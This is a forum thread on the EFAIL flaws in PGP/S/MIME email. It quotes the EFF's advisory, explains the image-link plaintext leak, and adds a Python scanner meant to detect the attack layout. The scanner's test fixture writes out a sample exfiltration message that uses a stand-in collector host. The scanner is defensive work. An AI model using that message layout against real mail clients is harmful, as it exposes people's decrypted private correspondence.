
eff says immediately disable or uninstall tools that auto decrypt PGP email


Security warning: the EFF says that you need to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.

This looks pretty serious.  Although they are not saying what the flaw is yet, the key seems to be if you have a mail program that AUTOMATICALLY decrypts pgp encrypted emails, somehow that can be hijacked.

--- Quote ---

A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.

The full details will be published in a paper on Tuesday at 07:00 AM UTC (3:00 AM Eastern, midnight Pacific). In order to reduce the short-term risk, we and the researchers have agreed to warn the wider PGP user community in advance of its full publication.

Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email. Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email.

--- End quote ---


Information is now available at

From a cursory glance, it seems the problem is in how some programs (email clients) handle image links embedded in html messages.

Basically, an attacker who has gotten hold of a message encrypted for you can send you an email with that encrypted message as part of a link to an image, and the email client will decrypt the encrypted part and then attempt to retrieve the image, effectively sending the plaintext to the attacker as part of the url.

That's pretty clever. But it seems to be not so big a risk to most people.
So, first step: an attacker needs to get hold of an email encrypted TO you that they want to be able to read. Without that there is no harm they can do.
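One defensive check a mail gateway or client could apply to the layout described in this post, as an added example (not code from this thread or from the researchers): using only Python's standard email module, it flags a message in which an HTML part opens a src= attribute that is only closed by a later part while an encrypted part sits in between, rather than decrypting and rendering it. The sample message, the collector.example.invalid host and the armored block are constructed placeholders.

```python
import email
import re
from email import policy
# The opening quote of a src= attribute must close inside the same MIME part; a client that
# decrypts and concatenates parts before rendering would otherwise let a later part close it.
_OPEN_SRC = re.compile(r'''\bsrc\s*=\s*(["'])''', re.IGNORECASE)

def has_unterminated_src(html: str) -> bool:
    """True if some src= attribute opens a quote that this part never closes."""
    return any(html.find(m.group(1), m.end()) == -1 for m in _OPEN_SRC.finditer(html))

def looks_encrypted(part) -> bool:
    """PGP/MIME part or inline armored block; nothing is decrypted here."""
    if part.get_content_type() in ("multipart/encrypted", "application/pgp-encrypted"):
        return True
    return b"-----BEGIN PGP MESSAGE-----" in (part.get_payload(decode=True) or b"")

def scan_message(raw: bytes) -> list:
    """Findings for one raw message; an empty list means no EFAIL-style layout."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings, encrypted = [], False
    for part in msg.walk():  # containers yield no payload bytes and pass both checks
        if looks_encrypted(part):
            encrypted = True
        elif part.get_content_type() == "text/html" and has_unterminated_src(part.get_content()):
            findings.append("text/html part leaves a src= attribute open")
    if encrypted and findings:
        findings.append("open attribute beside an encrypted part: do not auto-decrypt and render")
    return findings
# Constructed sample (placeholder armor, not a real ciphertext): the first HTML part opens
# src=" and only the third part closes it, with the encrypted part sandwiched in between.
SUSPICIOUS = b"""\
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html

<img src="https://collector.example.invalid/
--b1
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
placeholder-not-a-real-ciphertext
--b1
Content-Type: text/html

">
--b1--
"""
# Constructed control: the image tag becomes ordinary text, so no attribute stays open.
BENIGN = SUSPICIOUS.replace(b'<img src="https://collector.example.invalid/', b"<p>See attached.</p>")
```

A client that refuses to auto-render on a non-empty result still lets the user decrypt the message by hand in a separate tool, which matches the workaround suggested later in this thread.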

A simple workaround for those that need this functionality in their mail client: disable the (automatic) opening of mail messages with HTML content.

For those able to read the source of mail messages: copy-paste the content of the encrypted message into another piece of software that is not your mail client, but which is (at least rudimentarily) able to process the encrypted content anyway.

Automatic opening/viewing of mail messages should be prohibited in practically every imaginable use case scenario anyway. Efail is just the latest example of this.

